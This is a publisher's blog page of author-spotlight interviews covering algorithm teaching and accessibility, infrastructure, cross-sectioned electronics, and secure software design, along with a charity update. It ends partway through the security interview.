No Starch Press Blog

Solving Problems with Algorithms-Ace Dan Zingaro

 

Cover of Algorithmic Thinking, 2nd EditionOur latest Author Spotlight is on computer-science whiz Daniel Zingaro, author of Algorithmic Thinking as well as its soon-to-be published second edition, and Learn to Code by Solving Problems (2021). In the following Q&A, we talk with Dan about his favorite childhood computing memory, how he went from nearly dropping out of CS classes at university to teaching them, the accessibility tools that helped him become a programmer despite being severely visually impaired, and why fellow educators should feel empowered to write books about the subjects they teach.

Daniel Zingaro, PhD, is an award-winning associate professor of Mathematical and Computational Sciences at the University of Toronto Mississauga, where he is well-known for his uniquely interactive approach to teaching, and internationally recognized for his expertise in Active Learning. In addition to writing, educating, and researching, Zingaro is one of our go-to technical editors, whose work includes Python for Kids, 2nd Edition (2022), Data Structures the Fun Way (2022), Python for Data Science (2022), and Python One-Liners (2020).


No Starch Press: Congratulations on the second edition of Algorithmic Thinking! One of the things that really makes it unique is your show-not-tell approach to teaching algorithms, where you present the problem first and then guide the reader toward finding the fastest, cleverest solution. It can’t be a coincidence that you’re also an award-winning college professor known for your “active learning” method. Did your experience as an educator influence the way you wrote the book?

 
Daniel Zingaro: Oh, definitely. I've learned so much about teaching from my students, and I always try to incorporate as much of that as I can into my writing. The reason I flipped the book to be "problem first, material second," rather than the opposite, is because many people are not motivated to learn abstract stuff without understanding why it might be useful or matter to them. If I can have a reader read a description of a problem and be like, "Yo! I don't know how to solve this thing," then I feel like the real learning can begin.
 
I've also tried to make the book inviting to students who might otherwise not feel welcome. For example, I didn't put proofs or theorems or much math in there, because I know what that stuff does to many students: "Theorem 1: let x, y, and z be ... oh hey look, a new YouTube video!" So why force students to learn in a specific way? Because we happened to learn that way? Because that's the only way to teach it? Those reasons aren't acceptable to me. Students provide constraints on how they want to learn. If we professors are all we think we're cracked up to be, let's rise to this challenge and teach under those constraints. There's no right way to teach. If someone (like, literally, I mean one person) learns from it, then it is right.

 
NSP: It’s hard to believe that you twice came close to dropping out of Computer Science while attending university — and nearly failed a course that you later went on to teach. But it must be true because you disclose this personal trivia to your students. Why is it important for you to be so open about your past struggles?
 
DZ: It's true! I really need to dig out my old transcript and post it online for students so they can see my nearly failed grade. It's very important to me to share these low points with students because many students experience low points of their own. The way I connect with the world is through humor and making personal connections. If there's anything I can share with people that helps me make these connections, then I will do it. 
 
My waffling on whether to drop out of Computer Science, and suffering some poor grades, offer ways for me to make these connections. How funny, right? A professor that almost failed a course? It's really too bad that it's funny – I mean, the only reason it's funny is because it's so rare. With the poor grades and other challenges, I'm fortunate to have still gotten here. But I did, somehow. I figure that maybe my struggles can somehow help someone else with their own struggles.

 
NSP: Let’s talk about accessible computing for a moment. A lot of our readers may be surprised to learn that you’ve been blind your entire life, which would put you in the very small category of visually impaired students who successfully learn programming and earn advanced degrees in the subject. What adaptive tools helped you overcome the challenges you faced? And, how has the level of accessibility in computing evolved?
 
DZ: Yep – that's why my books don't have any extraneous pictures. Or cute sidebars. Or cute icons.
 
The computing tools for accessibility these days are making huge advances. I use the free NVDA screen-reader to do all of my computing tasks. But looking back, the tools only helped me because my parents gave me the opportunity for the tools to help me. My parents are in the Acknowledgements section of my book because, without them, there is no book, there is no career, there is no who-knows-what-else. If you have a disability or are otherwise being excluded, then (if it's safe to do so): advocate for yourself. That's what I learned from them. Could I have advocated for myself otherwise? Could I have advocated if I didn't feel safe in Canada doing so? Probably not. That's scary. I may have worked hard, but the world gave me the opportunity for my work to mean something. How many people work even harder and never have the opportunity to benefit? That's a tragedy.
 
I try to use one of my lectures every year to show my students the tools that I use to teach. They're computer scientists and are going to be building tools that all of us will use in the future, so I like to show them how much accessibility matters, for real, to a real person. And I always start with a 10-minute discussion of how I hope they interpret what I'm about to show them. It seems natural for them to hear my super-fast screen-reader speech, or the handheld device I use to read Braille, and be like, "holy cow, Dan is epic!" But I'm not. The tools are epic. Actually, wait; that's not quite it. We're all epic. Many people can read or write or do amazing things. And, yeah, the way that most (non-visually impaired) people do it is different than how I do it – but at the end of the day, the technology exists and makes it so that I can do it, too.
 
Also, a big shout-out to everyone who cares about accessibility and/or works to make software or processes or the world in general more accessible. We need people (including ourselves) to encourage us, and we need the accessibility tools to realize that encouragement.

 
NSP: Another thing our readers might not know about you is that you're the technical editor behind some of our bestselling books, including Data Structures the Fun Way and the new edition of Python for Kids. Since you've already made a name for yourself as a writer, what drew you to the unsung-hero role of technical editing, and can you tell us a little about what you actually do in that regard?
 
DZ: I find technical editing to be quite fun. I find learning fun, and editing books helps me sharpen what I know about a particular topic, so it's kind of fun by default. I also welcome the opportunity to help authors produce even better books. It's the best when there's an author doing great work, and I can in some small way help that author even further. Sometimes I'll be editing a book and think, "dang, this is so good! Why couldn't I have written this?" But, the reason is that I couldn't write their book even if I tried. The author has a particular voice, a particular expertise. Editing permits me to revel in that expertise, to just be grateful for the fact that here we have another author who has the ability and opportunity and life circumstances to share what they know.
 
What I do when editing is annoy the author with every tiny improvement/possible improvement that I can think of. (No, really – ask them.) I check all of the code and text, of course, but that's not my favorite part. My favorite part is using what I know about teaching to offer suggestions where I suspect learners may get particularly stuck. A lot of the topics covered in these books are ones I haven't taught before, and even if I have, I know only a small amount about where and why learners do or do not make progress. The challenge really never goes away, that's for sure, but I welcome any opportunity to try my best to be helpful given what I do know.
 
 
NSP: Like many of our authors, you’ve been into programming since you were young. What’s your earliest memory of enjoying computing, and when did it go from being a hobby to a career path?
 
DZ: One of my earliest computing memories also happens to be one of my favorites. My family was trying to get me a computer loaned to us with screen-reading technology on it (as it was expensive in those days and involved several interacting software and hardware devices). We were at an assessment center to look at some models, and my dad and some employees were talking about computery stuff that I didn't understand. Honestly, all I wanted to do was play a computer game or type something funny on the screen, but the adults just kept talking. Finally they stopped and wanted me to try out three different types of computers to see which one I could best work with. I started with the first computer, typing a little story. And then I managed to do what turned out to be the best thing ever: I froze the machine. But not just a normal freeze, a hilarious freeze where the screen-reader thing kept repeating the same “ah ah ah” syllable again and again, with no way to stop it. All of the fancy computery people were trying fancy things but simply could not make it stop. I was doing my absolute best not to laugh, because I desperately wanted the chance to take home a computer that day. Eventually they gave up and had to completely shut it down by flicking the power switch. Once they did that, I just couldn't hold it in anymore and burst out laughing (while also realizing I probably blew my chance at getting them to give me a PC). But, no! It turns out that they were actually impressed that I had successfully frozen the computer, and agreed to loan it to us on the spot. Looking back, I didn't do anything impressive – probably just pressed a bunch of keys at the same time or some such nonsense.
 
Presently, I'd say I'm more of a teacher-person than a computer-person. Computing happens to be the thing that I can apparently teach best, but I get my true motivation from teaching in and of itself. I often catch myself learning something new and then immediately thinking about how I might teach it. Or I'll solve a computing problem and then be thinking about which chapter of a book it might serve as an example in.
 
 
NSP: You’ve been an at UT-Mississauga for nearly a decade now. What’s the most significant thing you’ve discovered about teaching Computer Science in all that time?
 
DZ: The most significant thing I've learned is that every book is total junk for a subset of students. For any one of the textbooks I use – say, a classic CS book – there is a subset of students for whom that book just doesn't work. In fact, my happiest teaching days usually involve a student telling me that my book isn't working for them. Now, it might not be their happiest day, because then I try to drag them into a two-hour conversation about why it isn’t working. But I really do want to learn from them and try to do better. And they know how passionate I am about learning, so I don't feel too bad about that!

 
NSP: Much like sky-diving, writing a book takes a leap of faith — and you’ve done both. What advice can you offer to fellow CS educators who have thought about becoming an author but are scared to make the jump?
 
DZ: I'm married now, and I'm pretty sure I signed some wedding papers that make me not allowed to skydive anymore. (I'm guessing that book-writing is still okay, though.)
 
I think CS educators are in a unique position to write books that teach. They have so much experience in the classroom, and I myself was surprised how much of it I was able to carry over into my writing. I'm not an algorithms researcher. I don't know a whole lot more about algorithms than what I put into the book. (You'll know that I learned new algorithm stuff if you ever see a third edition of Algorithmic Thinking!) But, you know what? I think not being an algorithms researcher was a blessing for this book. I'm not so far removed from remembering how challenging it was for me to learn these concepts the first time. And the approaches I know best are the general (not specialized) ones that are applicable to a wide variety of problems that programmers might run into in the wild. I hope readers can see in every chapter how excited I am to learn even more about algorithms, and I hope that excitement helps fuel their own excitement.
 
So, say you teach a web programming course. Or an architecture course. You've tuned it. Your students respond well. Who cares if you're not the foremost expert on web programming or architecture? You're a teacher who knows how to connect with students and, as such, your book is valuable.
 

 

*Use coupon code SPOTLIGHT25 to get 25% off Algorithmic Thinking, 2nd Edition (in addition to the current 25% discount pre-order promo), and 25% off Learn to Code By Solving Problems. Promotion ends June 14, 2023, at midnight PT.

Ride-Along with Engineer Grady Hillhouse, the Ultimate Road Trip Buddy

 

Cover of Engineering in Plain SightNew year, new spotlight—and this one shines on civil engineer and YouTube star Grady Hillhouse. His first book, Engineering in Plain Sight, was released this past Fall to critical acclaim. In the following Q&A, we talk with Grady about how he went from civil engineer to full-time video producer with over 3 million subscribers (hint: woodworking), why all he needed to know about science communication he learned in kindergarten, the importance of average citizens understanding how things work, and the joy of "infrastructure spotting" on the road.

 

Grady Hillhouse is a civil engineer and science communicator widely known for his educational video series "Practical Engineering," currently one of the largest engineering channels on YouTube, with millions of views each month. His videos, which focus on infrastructure and the human-made environment, have garnered media attention from around the world and been featured on the Science Channel, Discovery Channel, and in many publications. Before producing videos full- time, Grady worked as an engineering consultant, focusing primarily on dams and hydraulic structures. He holds degrees from Texas State University and Texas A&M University.


No Starch Press: You got your bachelor’s degree in geography, then later earned a master’s degree in civil engineering, and spent nearly a decade working in the field on infrastructure projects. How did you go from that path to becoming a full-time YouTube sensation?

Grady Hillhouse: Making YouTube videos started as a hobby for me when I was given some woodworking tools. I wanted to learn to use them, and of course, I went to YouTube to watch tutorials. What I found was a community of woodworkers producing videos of their projects and sharing with each other. I was so fascinated that YouTube could be used in a social way (I had only thought of it as a search engine for videos), and I wanted to be a part of the community. Over time, I started including some engineering into my woodworking videos. Eventually I realized that I really enjoy sharing my passion and experience in engineering to others, and I decided to focus on that topic. 
 
I continued making videos about engineering and infrastructure in my free time, and worked to make them better and better. When my first son was born, all that free time I had to make videos vanished. I was forced to make a choice between sticking with my career in engineering or finding a way to support my family with my hobby. Ultimately, I decided I could have a bigger impact on the world producing videos (and writing a book). If everything comes crashing down, I still have my engineering license to fall back on!

 
NSP: You clearly have a genuine passion for the built environment—it shines through in every one of your YouTube videos and all throughout the new book. So, chicken or the egg: Did this interest spring from your graduate studies and (initial) profession, or did your fervor for infrastructure influence your academic and career pursuits?
 
GH: I have been interested in how things work since I was a kid, but my passion for infrastructure really didn’t come until college. My undergraduate classes in water resources are really what led me into civil engineering. My engineering classes are where my eyes were opened to all the “hidden in plain sight” details of the built environment. Every class was like turning on a lamp to illuminate some innocuous part of the constructed environment that I had never noticed before, and I just never stopped paying attention since.

 
NSP: Like Bill Nye and Neil deGrasse Tyson, you’re known as a “science communicator.” But one thing engineers are not typically known for is the ability to explain complex technical processes in laypeople's terms. What’s your trick for translating “engineer speak” into engaging, accessible content without dumbing it down?
 
GH: My wife was a kindergarten teacher when I first started working as an engineer, and I once got invited to her elementary school to give a presentation about civil engineering. I built a model that shows the different purposes of a dam and reservoir. The first presentation I gave went really well. It seemed like the kids were interested in what I had to say, but I noticed that I was getting questions from teachers. So the next few classes, I started paying attention to the teachers and administrators in the back as I went through my presentation, and was surprised at how attentive they were. 
 
It slowly kind of dawned on me over the course of these five or six presentations I gave that, when I talked about my career to adults, I was usually trying to make myself sound smart and dignified, avoid dumbing it down, or accidentally patronizing someone. But, when I was talking to students, I didn’t have those pretenses. 
 
I’ve basically spent the past 10 years reminding myself that the average adult knows just as much about civil engineering as your average kindergartner. Half of civil engineers just think about dirt and rock all day. We have no good reason to pretend to be so dignified. It’s not just how you keep the interest of a bunch of kindergartners for 15 minutes; it’s how you reach an audience on their level.

 
NSP: Your book is an “illustrated field guide to the constructed environment” and, indeed, the simple yet incredibly detailed illustrations of every structure being explained on the page really highlight why they should be seen as “monuments to the solutions to hundreds of practical engineering problems,” as you put it. How did these awesome little artistic renderings come about?
 
GH: The idea for the book was very much rooted in the idea that there are all kinds of structures and devices that we see out in the world but can’t identify, and really, can’t even do an internet search for because they are quite difficult to describe. So, each section focuses on the parts of infrastructure that you can see. Just like using a field guide to birds or plants or rocks, as you slowly start to learn the names and purposes of what you can observe, it makes being outside a lot more fun. It gives you something to pay attention to on walks or road trips.
 
When I was a kid, one of my favorite things to do while bored was to open an encyclopedia up to a random page and read about what I found. I really wanted readers to use Engineering In Plain Sight the same way where you can just open to any page and find something interesting. I worked really hard with my graphics team at MUTI to make each one of the illustrations as rich and full of detail as possible, and I’m so proud of what we came up with together.

 
NSP: Similar to your YouTube channel, “Practical Engineering,” has gotten an amazing response from a wide-ranging audience. And I think it’s fair to say that the majority of people who pre-ordered the book or put it on their holiday wish-list were not, in fact, engineers (though it's been popular in engineering circles, too). Why do you think the rest of us are so captivated by getting an inside look at how cell towers, highways, levees—the built world—actually works?
 
GH: It’s hard to say for sure! But, I suspect part of it is that these structures really are in plain sight. Learning something new about some seemingly mundane part of your immediate surroundings is magical. My favorite comment to get on a video is, “I didn’t even realize I was curious about this until you asked the question.”

 
NSP: A few months ago, you did a “Practical Engineering” video on a massive—and massively troubled—South Texas bridge project. For those who live in the area, like yourself, it’s a local issue. But your “Harbor Bridge” episode now has over 1.6 million views and nearly 3,000 comments. Do you think that helping people understand the infrastructure in their community (and how it can fail) is a way to strengthen civic engagement through a more informed citizenry?
 
GH: I really do believe we need to understand our connection to the constructed environment to care for it and to invest in it, which means we need to know at least a little bit about how it works. Our lives rely on many types of infrastructure: roads, bridges, dams, sewers, pipelines, retaining walls, water towers—these structures form the basic pillars of modern society. 
 
And the decisions we make about infrastructure —where to build it, how to pay for it, and when we maintain it—have consequences that affect everyone in powerful and fundamental ways. So, we need everyone to be involved in those decisions, not just engineers and bureaucrats. We all carry some responsibility for how the world is built around us. Investment in infrastructure requires that we value and appreciate it first, and so that’s what I try to do with my videos and the book.

 
NSP: In addition to opening everyone’s eyes to the feats of infrastructure that surround and support our modern lives, you’ve also introduced us to the oddly joyful pastime of “infrastructure spotting”—something you apparently still get a kick out of. In fact, you note that your “entire life is essentially a treasure hunt for all the interesting little details of the constructed world.” (I bet you’re fun on road trips!) What fuels your ongoing enthusiasm and sense of wonder for the built environment, given you literally wrote the book on the subject?

GH: In any city I visit, I want to learn where they get their water, how their electrical grid is set up, how they manage drainage and flooding and transit and wastewater, et cetera. There is so much variety in how we solve difficult challenges through infrastructure. Plus, we’re always building new things and using new technologies. So, there’s almost always something new to see wherever you go!  

 

With Your Help, We Raised Over $2.75M for Charity!

 

We’ve been partnering with our authors and Humble Bundle on special pay-what-you-want ebook deals since 2015—that’s 30 bundles to date, for those keeping score at home. As anyone who’s taken advantage of these promotions knows, the PWYW model means that you choose between various pricing tiers of titles, then decide how much of your purchase goes to charity.

This is all to say: THANK YOU. We’re fortunate to have such a generous customer base, because over the last eight years we’ve raised more than $2.75 million for two-dozen non-profits, as well as the Hacker Alliance—a 501(c)(3) created by publisher Bill Pollock to support hacker communities around the world.

From promoting digital rights and fighting censorship, to helping marginalized populations learn to code, to supporting education through the United Negro College Fund and Teach for America, we’ve done a lot of good together.

Here’s the full list of nonprofits that your charitable donations have gone towards:

  • Electronic Frontier Foundation
  • The No Starch Press Foundation 
  • Python Software Foundation 
  • Choose-Your-Own-Charity 
  • National Coalition Against Censorship 
  • Freedom of the Press Foundation 
  • Code.org 
  • Internet Security Research Group
  • Freedom to Read Foundation 
  • Book Industry Charitable Foundation
  • Girls Who Code 
  • Comic Book Legal Defense Fund
  • Covenanthouse 
  • United Negro College Fund
  • Teach For America
  • Code-to-Learn Foundation 
  • Women Who Code, Inc. 
  • Extra Life 
  • Active Minds, Inc. 
  • Every Child a Reader
  • St. Jude Children's Research Hospital 
  • Call of Duty Endowment 
  • The Red Nose Day Fund / Comic Relief, Inc.
  • It Gets Better Project 

 

 

About Humble Bundle 

Humble Bundle sells digital content through its pay-what-you-want bundle promotions and the Humble Store. When purchasing a bundle, customers choose how much they want to pay and decide where their money goes—between the content creators, charity, and Humble Bundle. Since the company's launch in 2010, Humble Bundle has raised more than $140 million through the support of its community for a wide range of charities, providing aid for people across the world. For more information, visit https://www.humblebundle.com/charities

 

Cutting It Up with Open Circuits' Windell Oskay & Eric Schlaepfer

 

Aglow in our Author Spotlight series this month are the daring duo behind Open Circuits: The Inner Beauty of Electronic Components—Windell Oskay and Eric Schlaepfer. Their book is a truly unique photographic exploration of the astonishing design hiding in everyday electronics, and it's as awesome as it sounds. In the following Q&A, we talk with Eric and Windell about how this project came about, the ins and outs of the hardware disassembly and macro-photography feats it took to make the book, the surprises—both good and bad—that they encountered along the way, and the many challenges of cutting a cathode ray tube in two.

Eric SchlaepferOpen CircuitsWindell Oskay

Eric is a hardware engineer at Google, and runs the popular Twitter account @TubeTimeUS, where he posts cross-section photos, discusses retrocomputing and reverse engineering, and investigates engineering accidents. His better-known projects are the MOnSter 6502 (the world’s largest 6502 microprocessor, made out of individual transistors) and the Snark Barker (a retro recreation of the famous Sound Blaster sound card).

Windell is the co-founder of Evil Mad Scientist Laboratories, where he designs robots and produces DIY and OS hardware "for art, education, and world domination.” A longtime photographer, he holds a B.A. in Physics and Mathematics from Lake Forest College and a Ph.D. in Physics from the University of Texas at Austin. Besides Open Circuits, he's author of The Annotated Build-It-Yourself Science Laboratory (Maker Media, 2015).


No Starch Press: First of all, congratulations on all the hard work paying off. The response to your book has been incredible. Considering how popular cross-section pictures were when I was a kid, I guess it’s not too surprising. People still love peeking into things full of hidden complexities! But the books I remember were mostly just intricate drawings—for Open Circuits, you actually photographed real stuff that you cut in half. What inspired this project? Did you intend to add a whole new dimension to the “cutaway” genre?

Eric Schlaepfer: I grew up fascinated by cross sections and cutaways. I’m sure that influenced this book, but it’s not exactly what inspired me. It was a broken piece of equipment, and the problem was one of the electrical components (a tantalum capacitor similar to the one on page 40). I sanded it in half to see if I could figure out how it failed, tweeted a photo, and folks really enjoyed it. So I started cutting other parts in half, and that led to the book.

Windell Oskay: I’ve always been interested in how things are made, in addition to how they work and what’s inside them. One of the really remarkable things about physically cutting things is that you get to see so many features that are maybe incidental to the function of the device, but are signatures of the processes that went into making it. Each part tells a story. And, often, we’re not even saying anything about them. Those little stories are left for the readers to discover.

 

NSP: The two of you have professionally intersected over the years in Silicon Valley, and have worked together on some design projects for Evil Mad Scientist Laboratories. But who roped whom into this book idea? What compelled you to collaborate at such a level?

ES: We’ve worked together on a number of other projects, such as the Three Fives discrete 555 timer kit, as well as the world’s largest 6502 microprocessor—the MOnSter 6502. Windell had seen my photos on Twitter, and we started talking about how to turn it into a book. I don’t remember all the details but it was a very natural thing.

WO: We’ve had a number of fruitful collaborations. In addition to those that Eric mentioned, we also designed an educational project, “Uncovering the Silicon,” that we presented at Maker Faire (along with Ken Shirriff, our technical reviewer for Open Circuits, and John McMaster, who prepared some subjects for photography). In that project, we placed very simple integrated circuits under a microscope and showed how they worked by tracing their individual parts. There’s a sense in which our book is a successor to that project—we’re letting people look at things up close, and then talking through how they work. But, I think that there was actually a moment when I roped Eric into the book idea after seeing his early cross-section photos.

 

NSP: What was the most challenging aspect of putting this book together?

ES: There were many challenges. For me, the most difficult challenge was preparing the samples—it took a really long time to prepare each one, taking care to create a polished section with no scratches or blemishes, and being careful to remove every speck of dust.

WO: At one point we realized that we would have to cull the weakest subjects from our draft. We ended up deleting about a dozen—some quite interesting and beautiful—along with their descriptive text. The book is stronger as a whole because we did so, but it really stung at the time. Fine-tuning our text was also difficult in places. For a number of subjects, we only had a few sentences in which to flesh out subtle concepts clearly, to an audience composed of both laypeople and engineers.

 

NSP: How did you divide up all of the labor that the book entailed? I mean, you had to find hundreds of tiny electronic components, carefully cut them in half, photograph them, write the accompanying text for each page—the list goes on and on!

ES: Windell took on the photography and some of the sample preparation, introducing me to some more professional tools that I hadn’t used before. We spent time searching the local electronics surplus store for potential subjects, and I made a lot of exploratory cuts to see if a particular component would be good enough for the book. I’d say the writing was a 50/50 split—we spent so much time writing and editing over video-chat that I wouldn’t be able to point to any sentence and definitively say 'I wrote this.'

WO: In addition to the bulk of the cutting and sample preparation, Eric also drew the rough drafts of all of the illustrations and wrote the initial drafts of some of the most challenging subjects to describe. I took the photographs, fine-tuned the illustrations, and designed the initial page layout so that we could understand how much text could be paired with each photographic subject. And as Eric said, we worked together closely through all of the writing and editorial choices.

 

NSP: Eric—what was the hardest thing to cross-section, and how did you eventually make it work?

ES: The most challenging was the cathode ray tube (page 186). Windell had the idea to cut it on the slow-speed saw so we could remove the electron gun. I sectioned the glass envelope and the electron gun separately—each of those took several hours to wet sand. The parts were simply too fragile to section any other way. Cleaning the sectioned electron gun was difficult because of the small magnet inside, which vacuumed up the debris created during sanding.

 

NSP: Windell—unlike a cross-section illustration, capturing everything inside an object with a single photograph in a single frame had to be difficult at times. Can you give us some examples where you had to get creative to get the shot?

WO: One of the basic limitations that you can run into with macro photography is the limited depth of field—only a very narrow slice of the view is in focus at any given time. We used focus-stacking software to digitally combine pictures taken at different camera positions, stitching them together like a panorama where the entire subject is sharp and in focus. The circuit-board photograph on the front cover of the book was taken this way. Other times, the subject itself can just be plain hard to photograph.

For some of the LEDs, like the surface-mount LED on page 90, we took photos at different exposure levels and composited them (in a basic HDR—high dynamic range—process) so that you can see detail even in the brightly lit LED. For the color sensor on page 81, the photos came out drab until we added an additional light source at just the right position and brightness so that you could see the additional reflection.

 

NSP: How did you decide what samples and images ultimately made it into the book?

ES: During endless hours of video chat we discussed every potential sample and made a highly detailed spreadsheet. We’re both very organized.

WO: Some part of it was determined by which things we could get our hands on—there are probably 50 other things in the spreadsheet that we might have included if we had an example to disassemble. We did skip a number of potential subjects that were too similar to others, too difficult to section, too difficult to photograph, or that were less likely to be of general interest.

 

NSP: Anyone who’s into photography knows that what’s pleasing to the eye is not always pleasing to the lens. Were there any samples that you successfully cross-sectioned but just could not get a good photo of—things you left on the cutting-room floor, as it were?

WO: Yes, there were quite a few actually, including some that we put a lot of time into preparing. A good example is a reed relay, where we just couldn’t get a photo that clearly showed the features that we wanted to highlight.

 

NSP: Given that you both have backgrounds in hardware engineering—and professional tinkering in general—did you know in advance which electronic components would look cool from a cross-cutting perspective, or was there a lot of trial and error? Any surprises along the way, good or bad?

ES: I’ve seen a few component cross sections created for failure-analysis purposes, so I knew about certain components that would look good, but there were definitely a few surprises. We thought an RGB LED would look cool, but after cutting into one, it just didn’t really seem interesting. We took apart a boring-looking gray electronics module that turned out to be a fabulously complex jewel—the isolation amplifier (page 266).

WO: One of my favorites that took some experimentation was the multilayer ceramic capacitor (page 36). There’s never been any mystery about what is in one—stacked layers of metal electrodes—but it took us a lot of experimentation and cutting into different capacitors to find one where you could literally see and count the individual layers. There were definitely real surprises along the way. The way that the rocker DIP switch (page 110) works inside is just stunning elegance.

 

NSP: You include a “Retro Tech” section in the book for your vintage finds, like Nixie tubes, a mercury tilt switch, and even a magnetic tape head. From a purely aesthetic standpoint, which era wins (Old vs. Modern) as far as microscale interior design goes?

ES: They both fascinate me. Vintage components seem warm and natural to me, being made of less processed materials like brass, rubber, mica, and glass. Modern parts have a sort of cold Cartesian precision and a microscopic intricacy.

WO: Modern electronics has so much more to offer in interior design—there’s just so much more inside. If we were talking about exterior design, I’ll pick the vintage. I love all the brass and Bakelite.

 

NSP: Windell, your company’s motto is “Making the World a Better Place, One Evil Mad Scientist at a Time.” If you had to come up with a similar motto for your book, what would it be? I’ll go first: “Making the garage a messier place, one experiment at a time!” . . . I guess what I’m getting at is, what effect do you hope your work in this book has on people? Eric, same question for you.

WO: If the book needed a motto, other than our existing subtitle, I’d pick “Showing you the Hidden Wonders Inside Electronics.” I hope that it inspires people to open up their electronics and look inside. To look at the parts for the little clues about how they’re made, what they’re for, and how they work. To appreciate elegant design, where they weren’t looking for it before.

ES: I want to inflame curiosity. Earlier today my very young nephew was totally absorbed in a copy of the book, asking his mother afterwards if they had any circuits he could play with. The world is a better place with curious people living in it.

 

Redesigning Security with Living-Legend Loren Kohnfelder


This month, we continue our Author Spotlight series with an in-depth interview of Loren Kohnfelder—a true icon in the security realm, as well as the author of Designing Secure Software. In the following Q&A, we talk with him about the everlasting usefulness of threat modeling, why APIs are plagued by security issues, the unsolved mysteries of the SolarWinds hack, and what the recent Log4j exploit teaches us about the importance of prioritizing security design reviews.

DesigningSecureSoftware coverLoren Kohnfelder

Loren Kohnfelder is a highly influential veteran of the security industry, with over 20 years of experience working for companies such as Google and Microsoft—where he program-managed the .NET Framework. At Google, he was a founding member of the Privacy team, performing numerous security design reviews of large-scale commercial platforms and systems. Now retired and based in Hawaii, Loren expands upon his extraordinary contributions to security in his new book, detailing the concepts behind his personal perspective on technology (which can also be found on his blog), timeless insights on building software that's secure by design, and real-world guidance for non-security-experts.


No Starch Press: Aloha, Loren! We can’t talk about your new book without acknowledging the colossal impact your security work has had over the past five decades. For one, in your 1978 MIT thesis you invented Public Key Infrastructure (PKI), introducing the concepts of certificates, CRLs, and the model of trust underlying the entire freaking internet. You were also part of the Microsoft team that first applied threat modeling at scale, you co-developed the STRIDE threat-ID model (Spoofing identity, Tampering with data, Repudiation threats, Information disclosure, Denial of service and Elevation of privileges), and you helped bake security-design reviews into the development process at Google—all of which are key growth spurts in the evolution of software security.

Speaking of STRIDE, there are a lot of software professionals using the methodology who weren’t even born when you and Praerit Garg first invented it in the late ’90s. Pretty remarkable that something started in the era of desktop computing remains just as relevant in the age of cloud, mobile, and the web. Why do you think it continues to be so effective and seemingly immune from obsolescence?

Loren Kohnfelder: Aloha, Jen! STRIDE turned 23 this month, and the software landscape today is unrecognizable by comparison. Yet, the fundamentals of threat modeling are just as relevant as ever. I think that STRIDE's enduring value is due to its simplicity as an expression of very fundamental threats.

Since those early days, we now have pervasive internet connectivity, exponential growth in compute power and storage, cloud computing, and software itself is vastly more complex. All of these changes have grown the attack surface—plus our greater reliance on digital systems, as well as the massive amounts of data in the world, serve to increase motivation for attackers. For all of these reasons, threat modeling is more important than ever to gain a proactive view of the threat landscape for the best chance of designing, developing, and deploying a secure system.

It's important to note as well that STRIDE never purported to cover the only threats software needs to be concerned with, especially now that we have IoT, robots, and self-driving cars that directly act in the world, introducing new potential forms of harm. For applications beyond traditional information processing, it's critical to consider other possible threats for systems interacting with people and machines in powerful ways.

 

NSP: It’s normal for management to tap external security experts to ensure that tech products and systems are safe to deploy—often via a security review prior to release. An essential premise of your book rejects this standard in favor of moving security to the left. What’s wrong with the status quo, why is security by design better for the bottom line, and… are you ever worried that an angry mob of out-of-work security consultants might show up at your door?

LK: No worries at all that software security will be totally solved anytime soon, so there will continue to be strong demand for good minds defending our systems. This is the most challenging topic covered in the book, and my research included discussions with friends doing just that kind of work.

Rather than “reject,” I would say that I'm recommending moving left "in addition to." Here's what I wrote in the book (p. 235) on this: "Specialist consultants should supplement solid in-house security understanding and well-grounded practice, rather than being called in to carry the security burden alone." I don't think that any security consultant has ever concluded a review by saying, "I think I found the last vulnerability in the system!" So let's try to give them more secure software in the first place to review. The two approaches needn't be an either-or decision: the challenge is finding a good balance combining both approaches.

Honestly, I think the experts will appreciate reviewing well-designed systems without low-hanging fruit, so they can really demonstrate their chops by finding the more subtle flaws. In addition, solid design and review documents will provide a very useful map guiding their investigations compared to confronting a mass of code.

 

NSP: A point you make in the book is that “software security is at once a logical practice and an art form, one based on intuitive decision making.” This represents a paradigm shift for most developers, who tend to focus on “typical” use cases during the design phase—in other words, they presume the end product will be used as intended. You propose that they should actually be doing the opposite, that having a “security mindset” means looking at software and systems the way an attacker would. For those daunted by the prospect, can you explain what this means in practice?

LK: You have put your finger on the specific stretch that I'm inviting developers to make, and while the security mindset is a new perspective, I would say that it's more subtle than difficult. Having a security mindset involves seeing how unexpected actions might have surprising outcomes, such as realizing that a paperclip can be bent into a lockpick to open a tumbler lock. Another example from the book is a softball team deviously named "No Game Scheduled"—when the schedule was printed, other teams assumed the name meant that they had a bye, and therefore didn't show, forfeiting the game.

Again, this is a different viewpoint worth considering in addition to, not instead of, the usual. To help people new to the topic, the book is filled with all kinds of stories and basic examples that illustrate how attackers exploit obscure bugs. Malicious attacks on major systems regularly make the news, and we can decide to anticipate these eventualities throughout the development cycle, or not. It's worth adding that while security pros might be more facile at the security mindset, the software team members are the ones who know the code inside and out, so with a little practice they are better positioned for identifying these potential vulnerabilities.

 

NSP: Let’s talk about the bigger picture for a moment. We’re barely two years out from SolarWinds—one of the most effective cyber-espionage campaigns in history, where a routine software update launched an attack of epic proportions. If anything, it showed that threat actors know exactly how tech companies operate. Not to mention, the malicious code used in the attack was designed to be injected into the platform without arousing the suspicion of the development and build teams, which makes it all the more scary. If you could prescribe an industry-wide approach to preventing similar attacks in the future, what would it be?

LK: SolarWinds was a very sophisticated attack on a complex product, and the public information I've found doesn't provide a complete picture of exactly what actually happened. So my response here is based on a high-level take, not any specifics. First, I'd say that reliance on products like this, that are given broad administrative rights across large systems, puts a lot of high-value eggs in one basket.

I would love to see a detailed design document for the SolarWinds Orion product: did they anticipate potential threats (like what happened), and if so, what mitigations were built in? Publishing designs as a standard practice would give potential customers something substantial to evaluate, to see for themselves what risks products foresee and how they are mitigated. And when this kind of breach occurs, the design serves to guide analysis of events so we can learn how to do better in the future.

NSP: The massive scope of the SolarWinds incident—affecting dozens of companies and federal agencies—was made possible by the use of compromised X.509 certificates and PKI, in that attackers managed to distribute SUNBURST malware using software updates with valid digital signatures. Back in your time at MIT, you became known for defining PKI; today there’s an implication that code signed by software publishers is trustworthy, but in light of SolarWinds this no longer appears to be a safe assumption. Is there a solution to this on the horizon?

